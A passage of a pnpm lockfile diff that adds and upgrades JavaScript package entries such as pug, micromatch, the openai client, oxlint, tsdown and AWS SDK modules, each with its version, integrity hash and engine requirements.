sha512-8dD6FusOQSrpv9Z1rdNMdlSgQOIP880DHqnohobOmYLElGEqAL/JvxvuxZO16r4HtjTlfPRDC1hbvxC9dPN2nA==} engines: {node: '>= 18'} hasBin: true - marked@17.0.3: - resolution: {integrity: sha512-jt1v2ObpyOKR8p4XaUJVk3YWRJ5n+i4+rjQopxvV32rSndTJXvIzuUdWWIy/1pFQMkQmvTXawzDNqOH/CUmx6A==} + marked@17.0.4: + resolution: {integrity: sha512-NOmVMM+KAokHMvjWmC5N/ZOvgmSWuqJB8FoYI019j4ogb/PeRMKoKIjReZ2w3376kkA8dSJIP8uD993Kxc0iRQ==} engines: {node: '>= 20'} hasBin: true @@ -4719,6 +5121,13 @@ packages: resolution: {integrity: sha512-Snk314V5ayFLhp3fkUREub6WtjBfPdCPY1Ln8/8munuLuiYhsABgBVWsozAG+MWMbVEvcdcpbi9R7ww22l9Q3g==} engines: {node: '>=18'} + merge-stream@2.0.0: + resolution: {integrity: sha512-abv/qOcuPfk3URPfDzmZU1LKmuw8kT+0nIHvKrKgFrwifol/doWcdA4ZqsWQ8ENrFKkd67Mfpo/LovbIUsbt3w==} + + merge2@1.4.1: + resolution: {integrity: sha512-8q7VEgMJW4J8tcfVPy8g09NcQwZdbwFEqhe/WZkoIzjn/3TGDwtOCYtXGxA3O8tPzpczCCDgv+P2P5y00ZJOOg==} + engines: {node: '>= 8'} + methods@1.1.2: resolution: {integrity: sha512-iclAHeNqNm68zFtnZ0e+1L2yUIdvzNoauKU4WBA3VvH/vPFieF7qfRlwUZU+DA9P9bPXIS90ulxoUoCH23sV2w==} engines: {node: '>= 0.6'} @@ -4738,6 +5147,10 @@ packages: micromark-util-types@2.0.2: resolution: {integrity: sha512-Yw0ECSpJoViF1qTU4DC6NwtC4aWGt1EkzaQB8KPPyCRR8z9TWeV0HbEFGTO+ZY1wB22zmxnJqhPyTpOVCpeHTA==} + micromatch@4.0.8: + resolution: {integrity: sha512-PXwfBhYu0hBCPw8Dn0E+WDYb7af3dSLVWKi3HGv84IdF4TyFoC0ysxFd0Goxw7nSv4T/PzEJQxsYsEiFCKo2BA==} + engines: {node: '>=8.6'} + mime-db@1.52.0: resolution: {integrity: sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==} engines: {node: '>= 0.6'} @@ -4759,6 +5172,10 @@ packages: engines: {node: '>=4'} hasBin: true + mimic-fn@2.1.0: + resolution: {integrity: sha512-OqbOk5oEQeAZ8WXWydlu9HJjz9WVdEIvamMCcXmuqUYjTknH/sqsWvhQ3vgwKFRR1HpjvNBKQ37nbJgYzGqGcg==} + engines: {node: '>=6'} + mimic-function@5.0.1: resolution: {integrity: sha512-VP79XUPxV2CigYP3jWwAUFSku2aKqBH7uTAapFWCBqutsbmDo96KY5o8uh6U+/YSIn5OxJnXp73beVkpqMIGhA==} engines: {node: '>=18'} @@ -4877,6 +5294,10 @@ packages: node-readable-to-web-readable-stream@0.4.2: resolution: {integrity: sha512-/cMZNI34v//jUTrI+UIo4ieHAB5EZRY/+7OmXZgBxaWBMcW2tGdceIw06RFxWxrKZ5Jp3sI2i5TsRo+CBhtVLQ==} + node-sarif-builder@3.4.0: + resolution: {integrity: sha512-tGnJW6OKRii9u/b2WiUViTJS+h7Apxx17qsMUjsUeNDiMMX5ZFf8F8Fcz7PAQ6omvOxHZtvDTmOYKJQwmfpjeg==} + engines: {node: '>=20'} + node-wav@0.0.2: resolution: {integrity: sha512-M6Rm/bbG6De/gKGxOpeOobx/dnGuP0dz40adqx38boqHhlWssBJZgLCPBNtb9NkrmnKYiV04xELq+R6PFOnoLA==} engines: {node: '>=4.4.0'} @@ -4897,6 +5318,10 @@ packages: nostr-wasm@0.1.0: resolution: {integrity: sha512-78BTryCLcLYv96ONU8Ws3Q1JzjlAt+43pWQhIl86xZmWeegYCNLPml7yQ+gG3vR6V5h4XGj+TxO+SS5dsThQIA==} + npm-run-path@4.0.1: + resolution: {integrity: sha512-S48WzZW777zhNIrn7gxOlISNAqi9ZC/uQFnRdbeIHhZhCA6UqpkOT8T1G7BvfdgP4Er8gF4sUbaS0i7QvIfCWw==} + engines: {node: '>=8'} + npmlog@5.0.1: resolution: {integrity: sha512-AqZtDUWOMKs1G/8lwylVjrdYgqA4d9nu8hc+0gzRxlDb1I10+FHBGMXs6aiQHFdCUUlqH99MUMuLfzWDNDtfxw==} deprecated: This package is no longer supported. @@ -4945,6 +5370,10 @@ packages: once@1.4.0: resolution: {integrity: sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==} + onetime@5.1.2: + resolution: {integrity: sha512-kbpaSSGJTWdAY5KPVeMOKXSrPtr8C8C7wodJbcsd51jRnmD+GZu8Y0VoU6Dm5Z4vWr0Ig/1NKuWRKf7j5aaYSg==} + engines: {node: '>=6'} + onetime@7.0.0: resolution: {integrity: sha512-VXJjc87FScF88uafS3JllDgvAm+c/Slfz06lorj2uAY34rlUu0Nt+v8wreiImcrgAjjIHp1rXpTDlLOGw29WwQ==} engines: {node: '>=18'} @@ -4967,8 +5396,8 @@ packages: zod: optional: true - openai@6.25.0: - resolution: {integrity: sha512-mEh6VZ2ds2AGGokWARo18aPISI1OhlgdEIC1ewhkZr8pSIT31dec0ecr9Nhxx0JlybyOgoAT1sWeKtwPZzJyww==} + openai@6.27.0: + resolution: {integrity: sha512-osTKySlrdYrLYTt0zjhY8yp0JUBmWDCN+Q+QxsV4xMQnnoVFpylgKGgxwN8sSdTNw0G4y+WUXs4eCMWpyDNWZQ==} hasBin: true peerDependencies: ws: ^8.18.0 @@ -5001,21 +5430,21 @@ packages: resolution: {integrity: sha512-4/8JfsetakdeEa4vAYV45FW20aY+B/+K8NEXp5Eiar3wR8726whgHrbSg5Ar/ZY1FLJ/AGtUqV7W2IVF+Gvp9A==} engines: {node: '>=20'} - oxfmt@0.35.0: - resolution: {integrity: sha512-QYeXWkP+aLt7utt5SLivNIk09glWx9QE235ODjgcEZ3sd1VMaUBSpLymh6ZRCA76gD2rMP4bXanUz/fx+nLM9Q==} + oxfmt@0.36.0: + resolution: {integrity: sha512-/ejJ+KoSW6J9bcNT9a9UtJSJNWhJ3yOLSBLbkoFHJs/8CZjmaZVZAJe4YgO1KMJlKpNQasrn/G9JQUEZI3p0EQ==} engines: {node: ^20.19.0 || >=22.12.0} hasBin: true - oxlint-tsgolint@0.15.0: - resolution: {integrity: sha512-iwvFmhKQVZzVTFygUVI4t2S/VKEm+Mqkw3jQRJwfDuTcUYI5LCIYzdO5Dbuv4mFOkXZCcXaRRh0m+uydB5xdqw==} + oxlint-tsgolint@0.16.0: + resolution: {integrity: sha512-4RuJK2jP08XwqtUu+5yhCbxEauCm6tv2MFHKEMsjbosK2+vy5us82oI3VLuHwbNyZG7ekZA26U2LLHnGR4frIA==} hasBin: true - oxlint@1.50.0: - resolution: {integrity: sha512-iSJ4IZEICBma8cZX7kxIIz9PzsYLF2FaLAYN6RKu7VwRVKdu7RIgpP99bTZaGl//Yao7fsaGZLSEo5xBrI5ReQ==} + oxlint@1.51.0: + resolution: {integrity: sha512-g6DNPaV9/WI9MoX2XllafxQuxwY1TV++j7hP8fTJByVBuCoVtm3dy9f/2vtH/HU40JztcgWF4G7ua+gkainklQ==} engines: {node: ^20.19.0 || >=22.12.0} hasBin: true peerDependencies: - oxlint-tsgolint: '>=0.14.1' + oxlint-tsgolint: '>=0.15.0' peerDependenciesMeta: oxlint-tsgolint: optional: true @@ -5099,6 +5528,9 @@ packages: resolution: {integrity: sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==} engines: {node: '>=8'} + path-parse@1.0.7: + resolution: {integrity: sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==} + path-scurry@1.11.1: resolution: {integrity: sha512-Xa4Nw17FS9ApQFJ9umLiJS4orGjm7ZzwUrwamcGQuHSzDyth9boKDaycYdDcZDuqYATXw4HFXgaqWTctW/v1HA==} engines: {node: '>=16 || 14 >=14.18'} @@ -5132,6 +5564,10 @@ packages: picocolors@1.1.1: resolution: {integrity: sha512-xceH2snhtb5M9liqDsmEw56le376mTZkEX/jEb/RxNFyegNul7eNslCXP9FDj/Lcu0X8KEyMceP2ntpaHrDEVA==} + picomatch@2.3.1: + resolution: {integrity: sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==} + engines: {node: '>=8.6'} + picomatch@4.0.3: resolution: {integrity: sha512-5gTmgEY/sqK6gFXLIsQNH19lWb4ebPDLA4SdLP7dsWkIXHWlG66oPuVvXSGFPppYZz8ZDZq0dYYrbHfBCVUb1Q==} engines: {node: '>=12'} @@ -5211,6 +5647,9 @@ packages: process-warning@5.0.0: resolution: {integrity: sha512-a39t9ApHNx2L4+HBnQKqxxHNs1r7KF+Intd8Q/g1bUh6q0WIp9voPXJ/x0j+ZL45KF1pJd9+q2jLIRMfvEshkA==} + promise@7.3.1: + resolution: {integrity: sha512-nolQXZ/4L+bP/UGlkfaIujX9BKxGwmQ9OT4mOt5yvy8iK1h3wqTEJCijzGANTCCl9nWjY41juyAn2K3Q1hLLTg==} + proper-lockfile@4.1.2: resolution: {integrity: sha512-TjNPblN4BwAWMXU8s9AEz4JmQxnD1NNL7bNOY/AKUzyamc379FWASUhc/K1pL2noVb+XmZKLL68cjzLsiOAMaA==} @@ -5225,10 +5664,6 @@ packages: resolution: {integrity: sha512-CvexbZtbov6jW2eXAvLukXjXUW1TzFaivC46BpWc/3BpcCysb5Vffu+B3XHMm8lVEuy2Mm4XGex8hBSg1yapPg==} engines: {node: '>=12.0.0'} - protobufjs@8.0.0: - resolution: {integrity: sha512-jx6+sE9h/UryaCZhsJWbJtTEy47yXoGNYI4z8ZaRncM0zBKeRqjO2JEcOUYwrYGb1WLhXM1FfMzW3annvFv0rw==} - engines: {node: '>=12.0.0'} - proxy-addr@2.0.7: resolution: {integrity: sha512-llQsMLSUDUPT44jdrU/O37qlnifitDP+ZwrmmZcoSKyLKvtZxpyV0n2/bD/N4tBAAZ/gJEdZU7KMraoK1+XYAg==} engines: {node: '>= 0.10'} @@ -5243,6 +5678,42 @@ packages: psl@1.15.0: resolution: {integrity: sha512-JZd3gMVBAVQkSs6HdNZo9Sdo0LNcQeMNP3CozBJb3JYC/QUYZTnKxP+f8oWRX4rHP5EurWxqAHTSwUCjlNKa1w==} + pug-attrs@3.0.0: + resolution: {integrity: sha512-azINV9dUtzPMFQktvTXciNAfAuVh/L/JCl0vtPCwvOA21uZrC08K/UnmrL+SXGEVc1FwzjW62+xw5S/uaLj6cA==} + + pug-code-gen@3.0.3: + resolution: {integrity: sha512-cYQg0JW0w32Ux+XTeZnBEeuWrAY7/HNE6TWnhiHGnnRYlCgyAUPoyh9KzCMa9WhcJlJ1AtQqpEYHc+vbCzA+Aw==} + + pug-error@2.1.0: + resolution: {integrity: sha512-lv7sU9e5Jk8IeUheHata6/UThZ7RK2jnaaNztxfPYUY+VxZyk/ePVaNZ/vwmH8WqGvDz3LrNYt/+gA55NDg6Pg==} + + pug-filters@4.0.0: + resolution: {integrity: sha512-yeNFtq5Yxmfz0f9z2rMXGw/8/4i1cCFecw/Q7+D0V2DdtII5UvqE12VaZ2AY7ri6o5RNXiweGH79OCq+2RQU4A==} + + pug-lexer@5.0.1: + resolution: {integrity: sha512-0I6C62+keXlZPZkOJeVam9aBLVP2EnbeDw3An+k0/QlqdwH6rv8284nko14Na7c0TtqtogfWXcRoFE4O4Ff20w==} + + pug-linker@4.0.0: + resolution: {integrity: sha512-gjD1yzp0yxbQqnzBAdlhbgoJL5qIFJw78juN1NpTLt/mfPJ5VgC4BvkoD3G23qKzJtIIXBbcCt6FioLSFLOHdw==} + + pug-load@3.0.0: + resolution: {integrity: sha512-OCjTEnhLWZBvS4zni/WUMjH2YSUosnsmjGBB1An7CsKQarYSWQ0GCVyd4eQPMFJqZ8w9xgs01QdiZXKVjk92EQ==} + + pug-parser@6.0.0: + resolution: {integrity: sha512-ukiYM/9cH6Cml+AOl5kETtM9NR3WulyVP2y4HOU45DyMim1IeP/OOiyEWRr6qk5I5klpsBnbuHpwKmTx6WURnw==} + + pug-runtime@3.0.1: + resolution: {integrity: sha512-L50zbvrQ35TkpHwv0G6aLSuueDRwc/97XdY8kL3tOT0FmhgG7UypU3VztfV/LATAvmUfYi4wNxSajhSAeNN+Kg==} + + pug-strip-comments@2.0.0: + resolution: {integrity: sha512-zo8DsDpH7eTkPHCXFeAk1xZXJbyoTfdPlNR0bK7rpOMuhBYb0f5qUVCO1xlsitYd3w5FQTK7zpNVKb3rZoUrrQ==} + + pug-walk@2.0.0: + resolution: {integrity: sha512-yYELe9Q5q9IQhuvqsZNwA5hfPkMJ8u92bQLIMcsMxf/VADjNtEYptU+inlufAFYcWdHlwNfZOEnOOQrZrcyJCQ==} + + pug@3.0.3: + resolution: {integrity: sha512-uBi6kmc9f3SZ3PXxqcHiUZLmIXgfgWooKWXcwSGwQd2Zi5Rb0bT14+8CJjJgI8AB+nndLaNgHGrcc6bPIB665g==} + pump@3.0.4: resolution: {integrity: sha512-VS7sjc6KR7e1ukRFhQSY5LM2uBWAUPiOPa/A3mkKmiMwSmRFUITt0xuj+/lesgnCv+dPIEYlkzrcyXgquIHMcA==} @@ -5275,6 +5746,9 @@ packages: querystringify@2.2.0: resolution: {integrity: sha512-FIqgj2EUvTa7R50u0rGsyTftzjYmv/a3hO345bZNrqabNqjtgiDMgmo4mkUjd+nzU5oF3dClKqFIPUKybUyqoQ==} + queue-microtask@1.2.3: + resolution: {integrity: sha512-NuaNSa6flKT5JaSYQzJok04JzTL1CA6aGhv5rfLW3PgqA+M2ChpZQnAC8h8i4ZFkBS8X5RqkDBHA7r4hej3K9A==} + quick-format-unescaped@4.0.4: resolution: {integrity: sha512-tYC1Q1hgyRuHgloV/YXs2w15unPVh8qfu/qCTfhTYamaw7fyhumKa2yGpdSo87vY32rIclj+4fWYQXUMs9EHvg==} @@ -5330,6 +5804,13 @@ packages: regex@6.1.0: resolution: {integrity: sha512-6VwtthbV4o/7+OaAF9I5L5V3llLEsoPyq9P1JVXkedTP33c7MfCG0/5NOPcSJn0TzXcG9YUrR0gQSWioew3LDg==} + repeat-string@1.6.1: + resolution: {integrity: sha512-PV0dzCYDNfRi1jCDbJzpW7jNNDRuCOG/jI5ctQcGKt/clZD+YcPS3yIlWuTJMmESC8aevCFmWJy5wjAFgNqN6w==} + engines: {node: '>=0.10'} + + reprism@0.0.11: + resolution: {integrity: sha512-VsxDR5QxZo08M/3nRypNlScw5r3rKeSOPdU/QhDmu3Ai3BJxHn/qgfXGWQp/tAxUtzwYNo9W6997JZR0tPLZsA==} + request-promise-core@1.1.3: resolution: {integrity: sha512-QIs2+ArIGQVp5ZYbWD5ZLCY29D5CfWizP8eWnm8FoGD1TX61veauETVQbrV60662V0oFBkrDOuaBI8XgtuyYAQ==} engines: {node: '>=0.10.0'} @@ -5354,6 +5835,11 @@ packages: resolve-pkg-maps@1.0.0: resolution: {integrity: sha512-seS2Tj26TBVOC2NIc2rOe2y2ZO7efxITtLZcGSOnHHNOQ7CkiUBfw0Iw2ck6xkIhPwLhKNLS8BO+hEpngQlqzw==} + resolve@1.22.11: + resolution: {integrity: sha512-RfqAvLnMl313r7c9oclB1HhUEAezcpLjz95wFH4LVuhk9JF/r22qmVP9AMmOU4vMX7Q8pN8jwNg/CSpdFnMjTQ==} + engines: {node: '>= 0.4'} + hasBin: true + restore-cursor@5.1.0: resolution: {integrity: sha512-oMA2dcrw6u0YfxJQXm342bFKX/E4sG9rbTzO9ptUcR/e8A33cHuvStiYOwH7fszkZlZ1z/ta9AAoPk2F4qIOHA==} engines: {node: '>=18'} @@ -5366,6 +5852,10 @@ packages: resolution: {integrity: sha512-XQBQ3I8W1Cge0Seh+6gjj03LbmRFWuoszgK9ooCpwYIrhhoO80pfq4cUkU5DkknwfOfFteRwlZ56PYOGYyFWdg==} engines: {node: '>= 4'} + reusify@1.1.0: + resolution: {integrity: sha512-g6QUff04oZpHs0eG5p83rFLhHeV00ug/Yf9nZM6fLeUrPguBTkTQOdpAWWspMh55TZfVQDPaN3NQJfbVRAxdIw==} + engines: {iojs: '>=1.0.0', node: '>=0.10.0'} + rimraf@3.0.2: resolution: {integrity: sha512-JZkJMZkAGFFPP2YqXZXPbMlMBgsxzE8ILs4lMIX/2o0L9UBw9O/Y3o6wFw/i9YLapcUJWwqbi3kdxIPdC62TIA==} deprecated: Rimraf versions prior to v4 are no longer supported @@ -5375,8 +5865,8 @@ packages: resolution: {integrity: sha512-l0OE8wL34P4nJH/H2ffoaniAokM2qSmrtXHmlpvYr5AVVX8msAyW0l8NVJFDxlSK4u3Uh/f41cQheDVdnYijwQ==} hasBin: true - rolldown-plugin-dts@0.22.2: - resolution: {integrity: sha512-Ge+XF962Kobjr0hRPx1neVnLU2jpKkD2zevZTfPKf/0el4eYo9SyGPm0stiHDG2JQuL0Q3HLD0Kn+ST8esvVdA==} + rolldown-plugin-dts@0.22.4: + resolution: {integrity: sha512-pueqTPyN1N6lWYivyDGad+j+GO3DT67pzpct8s8e6KGVIezvnrDjejuw1AXFeyDRas3xTq4Ja6Lj5R5/04C5GQ==} engines: {node: '>=20.19.0'} peerDependencies: '@ts-macro/tsc': ^0.3.6 @@ -5394,8 +5884,8 @@ packages: vue-tsc: optional: true - rolldown@1.0.0-rc.5: - resolution: {integrity: sha512-0AdalTs6hNTioaCYIkAa7+xsmHBfU5hCNclZnM/lp7lGGDuUOb6N4BVNtwiomybbencDjq/waKjTImqiGCs5sw==} + rolldown@1.0.0-rc.7: + resolution: {integrity: sha512-5X0zEeQFzDpB3MqUWQZyO2TUQqP9VnT7CqXHF2laTFRy487+b6QZyotCazOySAuZLAvplCaOVsg1tVn/Zlmwfg==} engines: {node: ^20.19.0 || >=22.12.0} hasBin: true @@ -5408,6 +5898,9 @@ packages: resolution: {integrity: sha512-nLTrUKm2UyiL7rlhapu/Zl45FwNgkZGaCpZbIHajDYgwlJCOzLSk+cIPAnsEqV955GjILJnKbdQC1nVPz+gAYQ==} engines: {node: '>= 18'} + run-parallel@1.2.0: + resolution: {integrity: sha512-5l4VyZR86LZ/lDxZTR6jqL8AFE2S0IFLMP26AbjsLVADxHdhB/c0GUsH+y39UfCi3dzz8OlQuPmnaJOMoDHQBA==} + safe-buffer@5.1.2: resolution: {integrity: sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g==} @@ -5679,6 +6172,10 @@ packages: resolution: {integrity: sha512-yDPMNjp4WyfYBkHnjIRLfca1i6KMyGCtsVgoKe/z1+6vukgaENdgGBZt+ZmKPc4gavvEZ5OgHfHdrazhgNyG7w==} engines: {node: '>=12'} + strip-final-newline@2.0.0: + resolution: {integrity: sha512-BrpvfNAE3dcvq7ll3xVumzjKjZQ5tI1sEUIKr3Uoks0XUl45St3FlatVqef9prk4jRDzhW6WZg+3bk93y6pLjA==} + engines: {node: '>=6'} + strip-json-comments@2.0.1: resolution: {integrity: sha512-4gB8na07fecVVkOI6Rs4e7T6NOTki5EmL7TUduTs6bu3EdnSycntVJ4re8kgZA+wx9IueI2Y11bfbgwtzuE0KQ==} engines: {node: '>=0.10.0'} @@ -5694,6 +6191,10 @@ packages: resolution: {integrity: sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==} engines: {node: '>=8'} + supports-preserve-symlinks-flag@1.0.0: + resolution: {integrity: sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==} + engines: {node: '>= 0.4'} + table-layout@4.1.1: resolution: {integrity: sha512-iK5/YhZxq5GO5z8wb0bY1317uDF3Zjpha0QFFLA8/trAoiLbQD0HUbMesEaxyzUgDxi2QlcbM8IvqOlEjgoXBA==} engines: {node: '>=12.17'} @@ -5737,6 +6238,10 @@ packages: resolution: {integrity: sha512-PSkbLUoxOFRzJYjjxHJt9xro7D+iilgMX/C9lawzVuYiIdcihh9DXmVibBe8lmcFrRi/VzlPjBxbN7rH24q8/Q==} engines: {node: '>=14.0.0'} + to-regex-range@5.0.1: + resolution: {integrity: sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ==} + engines: {node: '>=8.0'} + toad-cache@3.7.0: resolution: {integrity: sha512-/m8M+2BJUpoJdgAHoG+baCwBT+tf2VraSfkBgl0Y00qIWt41DJ8R5B8nsEw0I58YwF5IZH6z24/2TobDKnqSWw==} engines: {node: '>=12'} @@ -5745,6 +6250,9 @@ packages: resolution: {integrity: sha512-o5sSPKEkg/DIQNmH43V0/uerLrpzVedkUh8tGNvaeXpfpuwjKenlSox/2O/BTlZUtEe+JG7s5YhEz608PlAHRA==} engines: {node: '>=0.6'} + token-stream@1.0.0: + resolution: {integrity: sha512-VSsyNPPW74RpHwR8Fc21uubwHY7wMDeJLys2IX5zJNih+OnAnaifKHo+1LHT7DAdloQ7apeaaWg8l7qnf/TnEg==} + token-types@6.1.2: resolution: {integrity: sha512-dRXchy+C0IgK8WPC6xvCHFRIWYUbqqdEIKPaKo/AcTUNzwLTK6AH7RjdLWsEZcAN/TBdtfUw3PYEgPr5VPr6ww==} engines: {node: '>=14.16'} @@ -5770,28 +6278,31 @@ packages: ts-algebra@2.0.0: resolution: {integrity: sha512-FPAhNPFMrkwz76P7cdjdmiShwMynZYN6SgOujD1urY4oNm80Ou9oMdmbR45LotcKOXoy7wSmHkRFE6Mxbrhefw==} - tsdown@0.21.0-beta.2: - resolution: {integrity: sha512-OKj8mKf0ws1ucxuEi3mO/OGyfRQxO9MY2D6SoIE/7RZcbojsZSBhJr4xC4MNivMqrQvi3Ke2e+aRZDemPBWPCw==} + tsdown@0.21.0: + resolution: {integrity: sha512-Sw/ehzVhjYLD7HVBPybJHDxpcaeyFjPcaDCME23o9O4fyuEl6ibYEdrnB8W8UchYAGoayKqzWQqx/oIp3jn/Vg==} engines: {node: '>=20.19.0'} hasBin: true peerDependencies: '@arethetypeswrong/core': ^0.18.1 + '@tsdown/css': 0.21.0 + '@tsdown/exe': 0.21.0 '@vitejs/devtools': '*' publint: ^0.3.0 typescript: ^5.0.0 - unplugin-lightningcss: ^0.4.0 unplugin-unused: ^0.5.0 peerDependenciesMeta: '@arethetypeswrong/core': optional: true + '@tsdown/css': + optional: true + '@tsdown/exe': + optional: true '@vitejs/devtools': optional: true publint: optional: true typescript: optional: true - unplugin-lightningcss: - optional: true unplugin-unused: optional: true @@ -5897,8 +6408,8 @@ packages: resolution: {integrity: sha512-pjy2bYhSsufwWlKwPc+l3cN7+wuJlK6uz0YdJEOlQDbl6jo/YlPi4mb8agUkVC8BF7V8NuzeyPNqRksA3hztKQ==} engines: {node: '>= 0.8'} - unrun@0.2.28: - resolution: {integrity: sha512-LqMrI3ZEUMZ2476aCsbUTfy95CHByqez05nju4AQv4XFPkxh5yai7Di1/Qb0FoELHEEPDWhQi23EJeFyrBV0Og==} + unrun@0.2.30: + resolution: {integrity: sha512-a4W1wDADI0gvDDr14T0ho1FgMhmfjq6M8Iz8q234EnlxgH/9cMHDueUSLwTl1fwSBs5+mHrLFYH+7B8ao36EBA==} engines: {node: '>=20.19.0'} hasBin: true peerDependencies: @@ -6024,6 +6535,10 @@ packages: jsdom: optional: true + void-elements@3.1.0: + resolution: {integrity: sha512-Dhxzh5HZuiHQhbvTW9AMetFfBHDMYpo23Uo9btPXgdYP+3T5S+p+jgNy7spra+veYhBP2dCSgxR/i2Y02h5/6w==} + engines: {node: '>=0.10.0'} + web-streams-polyfill@3.3.3: resolution: {integrity: sha512-d2JWLCivmZYTSIoge9MsgFCZrt571BikcWGYkjC1khllbTeDlGqZ2D8vD8E/lJa8WGWbb7Plm8/XJYV7IJHZZw==} engines: {node: '>= 8'} @@ -6055,6 +6570,10 @@ packages: win-guid@0.2.1: resolution: {integrity: sha512-gEIQU4mkgl2OPeoNrWflcJFJ3Ae2BPd4eCsHHA/XikslkIVms/nHhvnvzIZV7VLmBvtFlDOzLt9rrZT+n6D67A==} + with@7.0.2: + resolution: {integrity: sha512-RNGKj82nUPg3g5ygxkQl0R937xLyho1J24ItRCBTr/m1YnZkzJy1hUiHUJrc/VlsDQzsCnInEGSg3bci0Lmd4w==} + engines: {node: '>= 10.0.0'} + wordwrapjs@5.1.1: resolution: {integrity: sha512-0yweIbkINJodk27gX9LBGMzyQdBDan3s/dEAiwBOj+Mf0PPyWL6/rikalkv8EeD0E8jm4o5RXEOrFTP3NXbhJg==} engines: {node: '>=12.17'} @@ -6148,6 +6667,10 @@ snapshots: dependencies: zod: 4.3.6 + '@agentclientprotocol/sdk@0.15.0(zod@4.3.6)': + dependencies: + zod: 4.3.6 + '@anthropic-ai/sdk@0.73.0(zod@4.3.6)': dependencies: json-schema-to-ts: 3.1.1 @@ -6180,7 +6703,7 @@ snapshots: '@aws-crypto/sha256-js': 5.2.0 '@aws-crypto/supports-web-crypto': 5.2.0 '@aws-crypto/util': 5.2.0 - '@aws-sdk/types': 3.973.4 + '@aws-sdk/types': 3.973.5 '@aws-sdk/util-locate-window': 3.965.4 '@smithy/util-utf8': 2.3.0 tslib: 2.8.1 @@ -6188,7 +6711,7 @@ snapshots: '@aws-crypto/sha256-js@5.2.0': dependencies: '@aws-crypto/util': 5.2.0 - '@aws-sdk/types': 3.973.4 + '@aws-sdk/types': 3.973.5 tslib: 2.8.1 '@aws-crypto/supports-web-crypto@5.2.0': @@ -6197,7 +6720,7 @@ snapshots: '@aws-crypto/util@5.2.0': dependencies: - '@aws-sdk/types': 3.973.4 + '@aws-sdk/types': 3.973.5 '@smithy/util-utf8': 2.3.0 tslib: 2.8.1 @@ -6298,6 +6821,51 @@ snapshots: transitivePeerDependencies: - aws-crt + '@aws-sdk/client-bedrock@3.1004.0': + dependencies: + '@aws-crypto/sha256-browser': 5.2.0 + '@aws-crypto/sha256-js': 5.2.0 + '@aws-sdk/core': 3.973.18 + '@aws-sdk/credential-provider-node': 3.972.18 + '@aws-sdk/middleware-host-header': 3.972.7 + '@aws-sdk/middleware-logger': 3.972.7 + '@aws-sdk/middleware-recursion-detection': 3.972.7 + '@aws-sdk/middleware-user-agent': 3.972.19 + '@aws-sdk/region-config-resolver': 3.972.7 + '@aws-sdk/token-providers': 3.1004.0 + '@aws-sdk/types': 3.973.5 + '@aws-sdk/util-endpoints': 3.996.4 + '@aws-sdk/util-user-agent-browser': 3.972.7 + '@aws-sdk/util-user-agent-node': 3.973.4 + '@smithy/config-resolver': 4.4.10 + '@smithy/core': 3.23.9 + '@smithy/fetch-http-handler': 5.3.13 + '@smithy/hash-node': 4.2.11 + '@smithy/invalid-dependency': 4.2.11 + '@smithy/middleware-content-length': 4.2.11 + '@smithy/middleware-endpoint': 4.4.23 + '@smithy/middleware-retry': 4.4.40 + '@smithy/middleware-serde': 4.2.12 + '@smithy/middleware-stack': 4.2.11 + '@smithy/node-config-provider': 4.3.11 + '@smithy/node-http-handler': 4.4.14 + '@smithy/protocol-http': 5.3.11 + '@smithy/smithy-client': 4.12.3 + '@smithy/types': 4.13.0 + '@smithy/url-parser': 4.2.11 + '@smithy/util-base64': 4.3.2 + '@smithy/util-body-length-browser': 4.2.2 + '@smithy/util-body-length-node': 4.2.3 + '@smithy/util-defaults-mode-browser': 4.3.39 + '@smithy/util-defaults-mode-node': 4.2.42 + '@smithy/util-endpoints': 3.3.2 + '@smithy/util-middleware': 4.2.11 + '@smithy/util-retry': 4.2.11 + '@smithy/util-utf8': 4.2.2 + tslib: 2.8.1 + transitivePeerDependencies: + - aws-crt + '@aws-sdk/client-s3@3.1000.0': dependencies: '@aws-crypto/sha1-browser': 5.2.0 @@ -6374,6 +6942,22 @@ snapshots: '@smithy/util-utf8': 4.2.1 tslib: 2.8.1 + '@aws-sdk/core@3.973.18': + dependencies: + '@aws-sdk/types': 3.973.5 + '@aws-sdk/xml-builder': 3.972.10 + '@smithy/core': 3.23.9 + '@smithy/node-config-provider': 4.3.11 + '@smithy/property-provider': 4.2.11 + '@smithy/protocol-http': 5.3.11 + '@smithy/signature-v4': 5.3.11 + '@smithy/smithy-client': 4.12.3 + '@smithy/types': 4.13.0 + '@smithy/util-base64': 4.3.2 + '@smithy/util-middleware': 4.2.11 + '@smithy/util-utf8': 4.2.2 + tslib: 2.8.1 + '@aws-sdk/crc64-nvme@3.972.3': dependencies: '@smithy/types': 4.13.0 @@ -6387,6 +6971,14 @@ snapshots: '@smithy/types': 4.13.0 tslib: 2.8.1 + '@aws-sdk/credential-provider-env@3.972.16': + dependencies: + '@aws-sdk/core': 3.973.18 + '@aws-sdk/types': 3.973.5 + '@smithy/property-provider': 4.2.11 + '@smithy/types': 4.13.0 + tslib: 2.8.1 + '@aws-sdk/credential-provider-http@3.972.15': dependencies: '@aws-sdk/core': 3.973.15 @@ -6400,6 +6992,19 @@ snapshots: '@smithy/util-stream': 4.5.15 tslib: 